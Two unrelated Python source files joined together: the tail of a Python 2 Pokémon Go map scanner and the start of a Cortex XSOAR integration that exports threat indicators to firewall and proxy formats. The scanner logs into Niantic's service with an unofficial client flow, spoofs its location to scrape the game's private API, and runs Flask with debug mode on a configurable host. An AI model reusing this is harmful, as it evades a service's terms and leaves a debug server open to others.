print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching pokemons for location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = set([])
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId + ':' \
+ str(wild.pokemon.PokemonId)
if hash not in seen:
visible.append(wild)
seen.add(hash)
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokename = pokemonsJSON[str(poke.pokemon.PokemonId)]
if args.ignore:
if pokename.lower() in ignore:
continue
elif args.only:
if pokename.lower() not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(0, 0, 256, .4)"
if gym[0] == 2:
color = "rgba(255, 0, 0, .4)"
if gym[0] == 3:
color = "rgba(255, 255, 0, .4)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
ExportIndicators.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import re
import json
import traceback
from base64 import b64decode
from multiprocessing import Process
from gevent.pywsgi import WSGIServer
from tempfile import NamedTemporaryFile
from flask import Flask, Response, request
from netaddr import IPAddress, IPSet
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
from typing import Callable, List, Any, cast, Dict, Tuple
class Handler:
@staticmethod
def write(msg: str):
demisto.info(msg)
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'Export Indicators Service'
PAGE_SIZE: int = 200
DEMISTO_LOGGER: Handler = Handler()
APP: Flask = Flask('demisto-export_iocs')
CTX_VALUES_KEY: str = 'dmst_export_iocs_values'
CTX_MIMETYPE_KEY: str = 'dmst_export_iocs_mimetype'
FORMAT_CSV: str = 'csv'
FORMAT_TEXT: str = 'text'
FORMAT_JSON_SEQ: str = 'json-seq'
FORMAT_JSON: str = 'json'
FORMAT_ARG_MWG = 'mwg'
FORMAT_ARG_PANOSURL = 'panosurl'
FORMAT_ARG_BLUECOAT = 'bluecoat'
FORMAT_ARG_PROXYSG = 'proxysg'
FORMAT_MWG: str = 'McAfee Web Gateway'
FORMAT_PROXYSG: str = "Symantec ProxySG"
FORMAT_PANOSURL: str = "PAN-OS URL"
FORMAT_XSOAR_JSON: str = 'XSOAR json'
FORMAT_ARG_XSOAR_JSON: str = 'xsoar-json'
FORMAT_XSOAR_JSON_SEQ: str = 'XSOAR json-seq'
FORAMT_ARG_XSOAR_JSON_SEQ: str = 'xsoar-seq'
FORMAT_XSOAR_CSV: str = 'XSOAR csv'
FORMAT_ARG_XSOAR_CSV: str = 'xsoar-csv'
MWG_TYPE_OPTIONS = ["string", "applcontrol", "dimension", "category", "ip", "mediatype", "number", "regex"]
CTX_FORMAT_ERR_MSG: str = 'Please provide a valid format from: text, json, json-seq, csv, mgw, panosurl and proxysg'
CTX_LIMIT_ERR_MSG: str = 'Please provide a valid integer for List Size'
CTX_OFFSET_ERR_MSG: str = 'Please provide a valid integer for Starting Index'
CTX_MWG_TYPE_ERR_MSG: str = 'The McAFee Web Gateway type can only be one of the following: string,' \
' applcontrol, dimension, category, ip, mediatype, number, regex'
CTX_COLLAPSE_ERR_MSG: str = 'The Collapse parameter can only get the following: 0 - Dont Collapse, ' \
'1 - Collapse to Ranges, 2 - Collapse to CIDRS'
CTX_MISSING_REFRESH_ERR_MSG: str = 'Refresh Rate must be "number date_range_unit", examples: (2 hours, 4 minutes, ' \
'6 months, 1 day, etc.)'
CTX_NO_URLS_IN_PROXYSG_FORMAT = 'ProxySG format only outputs URLs - no URLs found in the current query'
MIMETYPE_JSON_SEQ: str = 'application/json-seq'
MIMETYPE_JSON: str = 'application/json'
MIMETYPE_CSV: str = 'text/csv'
MIMETYPE_TEXT: str = 'text/plain'
DONT_COLLAPSE = "Don't Collapse"
COLLAPSE_TO_CIDR = "To CIDRs"
COLLAPSE_TO_RANGES = "To Ranges"
SORT_ASCENDING = 'asc'
SORT_DESCENDING = 'desc'
_PROTOCOL_REMOVAL = re.compile(r'^(?:[a-z]+:)*//')
_PORT_REMOVAL = re.compile(r'^([a-z0-9\-\.]+)(?:\:[0-9]+)*')
_INVALID_TOKEN_REMOVAL = re.compile(r'(?:[^\./+=\?&]+\*[^\./+=\?&]*)|(?:[^\./+=\?&]*\*[^\./+=\?&]+)')
_BROAD_PATTERN = re.compile(r'^(?:\*\.)+[a-zA-Z]+(?::[0-9]+)?$')
'''Request Arguments Class'''
class RequestArguments:
def __init__(self, query: str, out_format: str = FORMAT_TEXT, limit: int = 10000, offset: int = 0,
mwg_type: str = 'string', strip_port: bool = False, drop_invalids: bool = False,
category_default: str = 'bc_category', category_attribute: str = '',
collapse_ips: str = DONT_COLLAPSE, csv_text: bool = False, sort_field: str = '',
sort_order: str = ''):
self.query = query
self.out_format = out_format
self.limit = limit
self.offset = offset
self.mwg_type = mwg_type
self.strip_port = strip_port
self.drop_invalids = drop_invalids
self.category_default = category_default
self.category_attribute = [] # type:List
self.collapse_ips = collapse_ips
self.csv_text = csv_text
self.sort_field = sort_field
self.sort_order = sort_order
if category_attribute is not None:
category_attribute_list = category_attribute.split(',')
if len(category_attribute_list) != 1 or '' not in category_attribute_list:
self.category_attribute = category_attribute_list
def is_request_change(self, last_update_data: Dict):
if self.limit != last_update_data.get('last_limit'):
return True
elif self.offset != last_update_data.get('last_offset'):
return True
elif self.out_format != last_update_data.get('last_format'):
return True
elif self.mwg_type != last_update_data.get('mwg_type'):
return True
elif self.drop_invalids != last_update_data.get('drop_invalids'):
return True
elif self.strip_port != last_update_data.get('strip_port'):
return True
elif self.category_default != last_update_data.get('category_default'):
return True
elif self.category_attribute != last_update_data.get('category_attribute'):
return True
elif self.collapse_ips != last_update_data.get('collapse_ips'):
return True
elif self.csv_text != last_update_data.get('csv_text'):
return True
elif self.sort_field != last_update_data.get('sort_field'):
return True
elif self.sort_order != last_update_data.get('sort_order'):
return True
return False
''' HELPER FUNCTIONS '''
def list_to_str(inp_list: list, delimiter: str = ',', map_func: Callable = str) -> str:
"""
Transforms a list to an str, with a custom delimiter between each list item
"""
str_res = ""
if inp_list:
if isinstance(inp_list, list):
str_res = delimiter.join(map(map_func, inp_list))
else:
raise AttributeError('Invalid inp_list provided to list_to_str')
return str_res
def get_params_port(params: dict) -> int:
"""
Gets port from the integration parameters
"""
port_mapping: str = params.get('longRunningPort', '')
err_msg: str
port: int
if port_mapping:
err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
if ':' in port_mapping:
port = try_parse_integer(port_mapping.split(':')[1], err_msg)
else:
port = try_parse_integer(port_mapping, err_msg)
else:
raise ValueError('Please provide a Listen Port.')
return port
def sort_iocs(request_args: RequestArguments, iocs: list) -> list:
"""
Sorts the IoCs according to the sort field and order.
Returns: Sorted List of IoCs, if sorting arguments are defined.
"""
try:
if request_args.sort_field:
if request_args.sort_order == SORT_ASCENDING:
return sorted(iocs, key=lambda ioc: ioc[request_args.sort_field], reverse=False)
elif request_args.sort_order == SORT_DESCENDING:
return sorted(iocs, key=lambda ioc: ioc[request_args.sort_field], reverse=True)
except KeyError:
demisto.debug('ExportIndicators - Could not sort IoCs, please verify that you entered the correct field name.\n'
f'Field used: {request_args.sort_field}')
except Exception as e:
demisto.debug(f'ExportIndicators - Could not sort IoCs due to an unknown error.\n{e}')
return iocs
def refresh_outbound_context(request_args: RequestArguments) -> str:
"""
Refresh the cache values and format using an indicator_query to call demisto.searchIndicators
Returns: List(IoCs in output format)
"""
now = datetime.now()
# poll indicators into list from demisto
iocs = find_indicators_with_limit(request_args.query, request_args.limit, request_args.offset)
iocs = sort_iocs(request_args, iocs)
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
# if in CSV format - the "indicator" header
if request_args.out_format in [FORMAT_CSV, FORMAT_XSOAR_CSV]:
actual_indicator_amount = actual_indicator_amount - 1
# re-polling in case formatting or ip collapse caused a lack in results
while actual_indicator_amount < request_args.limit:
# from where to start the new poll and how many results should be fetched
new_offset = len(iocs) + request_args.offset + actual_indicator_amount - 1
new_limit = request_args.limit - actual_indicator_amount
# poll additional indicators into list from demisto
new_iocs = find_indicators_with_limit(request_args.query, new_limit, new_offset)
# in case no additional indicators exist - exit
if len(new_iocs) == 0:
break
# add the new results to the existing results
iocs += new_iocs
iocs = sort_iocs(request_args, iocs)
# reformat the output
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
if request_args.out_format == FORMAT_CSV:
actual_indicator_amount = actual_indicator_amount - 1
if request_args.out_format == FORMAT_JSON:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_JSON
elif request_args.out_format in [FORMAT_CSV, FORMAT_XSOAR_CSV]:
if request_args.csv_text:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_TEXT
else:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_CSV
elif request_args.out_format in [FORMAT_JSON_SEQ, FORMAT_XSOAR_JSON_SEQ]:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_JSON_SEQ
else:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_TEXT
set_integration_context({
"last_output": out_dict,
'last_run': date_to_timestamp(now),
'last_limit': request_args.limit,
'last_offset': request_args.offset,
'last_format': request_args.out_format,
'last_query': request_args.query,
'current_iocs': iocs,
'mwg_type': request_args.mwg_type,
'drop_invalids': request_args.drop_invalids,
'strip_port': request_args.strip_port,
'category_default': request_args.category_default,
'category_attribute': request_args.category_attribute,
'collapse_ips': request_args.collapse_ips,
'csv_text': request_args.csv_text,
'sort_field': request_args.sort_field,
'sort_order': request_args.sort_order,
})
return out_dict[CTX_VALUES_KEY]
def find_indicators_with_limit(indicator_query: str, limit: int, offset: int) -> list:
"""
Finds indicators using demisto.searchIndicators
"""
# calculate the starting page (each page holds 200 entries)
if offset:
next_page = int(offset / PAGE_SIZE)
# set the offset from the starting page
offset_in_page = offset - (PAGE_SIZE * next_page)
else:
next_page = 0
offset_in_page = 0
iocs, _ = find_indicators_with_limit_loop(indicator_query, limit, next_page=next_page)
# if offset in page is bigger than the amount of results returned return empty list
if len(iocs) <= offset_in_page:
return []
return iocs[offset_in_page:limit + offset_in_page]
def find_indicators_with_limit_loop(indicator_query: str, limit: int, total_fetched: int = 0, next_page: int = 0,
last_found_len: int = PAGE_SIZE):
"""
Finds indicators using while loop with demisto.searchIndicators, and returns result and last page
"""
iocs: List[dict] = []
if not last_found_len:
last_found_len = total_fetched
search_indicators = IndicatorsSearcher(page=next_page)
while last_found_len == PAGE_SIZE and limit and total_fetched < limit:
fetched_iocs = search_indicators.search_indicators_by_version(query=indicator_query, size=PAGE_SIZE).get('iocs')
iocs.extend(fetched_iocs)
last_found_len = len(fetched_iocs)
total_fetched += last_found_len
return iocs, search_indicators.page
def ip_groups_to_cidrs(ip_range_groups: list):
"""Collapse ip groups list to CIDRs
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of CIDRs.
"""
ip_ranges = [] # type:List
for cidr in ip_range_groups:
# handle single ips
if len(cidr) == 1:
# CIDR with a single IP appears with "/32" suffix so handle them differently
ip_ranges.append(str(cidr[0]))
continue
ip_ranges.append(str(cidr))
return ip_ranges
def ip_groups_to_ranges(ip_range_groups: list):
"""Collapse ip groups list to ranges.
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of Ranges.
"""
ip_ranges = [] # type:List
for group in ip_range_groups:
# handle single ips
if len(group) == 1:
ip_ranges.append(str(group[0]))
continue
ip_ranges.append(str(group))
return ip_ranges
def ips_to_ranges(ips: list, collapse_ips: str):
"""Collapse IPs to Ranges or CIDRs.
Args:
ips (list): a list of IP strings.
collapse_ips (str): Whether to collapse to Ranges or CIDRs.
Returns:
list. a list to Ranges or CIDRs.
"""
if collapse_ips == COLLAPSE_TO_RANGES:
ips_range_groups = IPSet(ips).iter_ipranges()
return ip_groups_to_ranges(ips_range_groups)
else:
cidrs = IPSet(ips).iter_cidrs()
return ip_groups_to_cidrs(cidrs)
def panos_url_formatting(iocs: list, drop_invalids: bool, strip_port: bool):
formatted_indicators = [] # type:List
for indicator_data in iocs:
# only format URLs and Domains
indicator = indicator_data.get('value')
if not indicator:
continue
if indicator_data.get('indicator_type') in ['URL', 'Domain', 'DomainGlob']:
indicator = indicator.lower()
# remove initial protocol - http/https/ftp/ftps etc
indicator = _PROTOCOL_REMOVAL.sub('', indicator)
indicator_with_port = indicator
# remove port from indicator - from demisto.com:369/rest/of/path -> demisto.com/rest/of/path
indicator = _PORT_REMOVAL.sub(r'\g<1>', indicator)
# check if removing the port changed something about the indicator
if indicator != indicator_with_port and not strip_port:
# if port was in the indicator and strip_port param not set - ignore the indicator
continue
with_invalid_tokens_indicator = indicator
# remove invalid tokens from indicator
indicator = _INVALID_TOKEN_REMOVAL.sub('*', indicator)
# check if the indicator held invalid tokens
if with_invalid_tokens_indicator != indicator:
# invalid tokens in indicator- if drop_invalids is set - ignore the indicator
if drop_invalids:
continue
# check if after removing the tokens the indicator is too broad if so - ignore
# example of too broad terms: "*.paloalto", "*.*.paloalto", "*.paloalto:60"
hostname = indicator
if '/' in hostname:
hostname, _ = hostname.split('/', 1)
if _BROAD_PATTERN.match(hostname) is not None:
continue
# for PAN-OS "*.domain.com" does not match "domain.com" - we should provide both
if indicator.startswith('*.'):
formatted_indicators.append(indicator[2:])
formatted_indicators.append(indicator)
return {CTX_VALUES_KEY: list_to_str(formatted_indicators, '\n')}, len(formatted_indicators)
def create_json_out_format(iocs: list):
formatted_indicators = [] # type:List
for indicator_data in iocs:
if indicator_data.get("value"):
json_format_indicator = json_format_single_indicator(indicator_data)
formatted_indicators.append(json_format_indicator)
return {CTX_VALUES_KEY: json.dumps(formatted_indicators)}
def json_format_single_indicator(indicator: dict):
json_format_indicator = {
"indicator": indicator.get("value")
}
indicator.pop("value", None)
json_format_indicator["value"] = indicator
return json_format_indicator
def add_indicator_to_category(indicator, category, category_dict):
if category in category_dict.keys():
category_dict[category].append(indicator)
else:
category_dict[category] = [indicator]
return category_dict
def create_proxysg_out_format(iocs: list, category_attribute: list, category_default: str = 'bc_category'):
formatted_indicators = ''
category_dict = {} # type:Dict
num_of_returned_indicators = 0
for indicator in iocs:
if indicator.get('indicator_type') in ['URL', 'Domain', 'DomainGlob'] and indicator.get('value'):
indicator_proxysg_category = indicator.get('proxysgcategory')
# if a ProxySG Category is set and it is in the category_attribute list or that the attribute list is empty
# than list add the indicator to it's category list
if indicator_proxysg_category is not None and \
(indicator_proxysg_category in category_attribute or len(category_attribute) == 0):
category_dict = add_indicator_to_category(indicator.get('value'), indicator_proxysg_category,
category_dict)
else:
# if ProxySG Category is not set or does not exist in the category_attribute list
category_dict = add_indicator_to_category(indicator.get('value'), category_default, category_dict)
for category, indicator_list in category_dict.items():
sub_output_string = f"define category {category}\n"
sub_output_string += list_to_str(indicator_list, '\n')
sub_output_string += "\nend\n"
formatted_indicators += sub_output_string
num_of_returned_indicators = num_of_returned_indicators + len(indicator_list)
if len(formatted_indicators) == 0:
raise Exception(CTX_NO_URLS_IN_PROXYSG_FORMAT)
return {CTX_VALUES_KEY: formatted_indicators}, num_of_returned_indicators
def create_mwg_out_format(iocs: list, mwg_type: str) -> dict:
formatted_indicators = [] # type:List
for indicator in iocs:
if not indicator.get('value'):
continue
value = "\"" + indicator.get('value') + "\""
sources = indicator.get('sourceBrands')
if sources:
sources_string = "\"" + ','.join(sources) + "\""
else:
sources_string = "\"from CORTEX XSOAR\""
formatted_indicators.append(value + " " + sources_string)
string_formatted_indicators = list_to_str(formatted_indicators, '\n')
if isinstance(mwg_type, list):
mwg_type = mwg_type[0]
string_formatted_indicators = "type=" + mwg_type + "\n" + string_formatted_indicators
return {CTX_VALUES_KEY: string_formatted_indicators}
def create_values_for_returned_dict(iocs: list, request_args: RequestArguments) -> Tuple[dict, int]:
"""
Create a dictionary for output values using the selected format (json, json-seq, text, csv, McAfee Web Gateway,
Symantec ProxySG, panosurl)
"""
if request_args.out_format == FORMAT_PANOSURL:
return panos_url_formatting(iocs, request_args.drop_invalids, request_args.strip_port)
if request_args.out_format == FORMAT_PROXYSG:
return create_proxysg_out_format(iocs, request_args.category_attribute, request_args.category_default)
if request_args.out_format == FORMAT_MWG:
return create_mwg_out_format(iocs, request_args.mwg_type), len(iocs)
if request_args.out_format == FORMAT_JSON:
return create_json_out_format(iocs), len(iocs)
if request_args.out_format == FORMAT_XSOAR_JSON:
iocs_list = [ioc for ioc in iocs]
return {CTX_VALUES_KEY: json.dumps(iocs_list)}, len(iocs)
else:
ipv4_formatted_indicators = []
ipv6_formatted_indicators = []
formatted_indicators = []
if request_args.out_format == FORMAT_XSOAR_CSV and len(iocs) > 0: # add csv keys as first item
headers = list(iocs[0].keys())
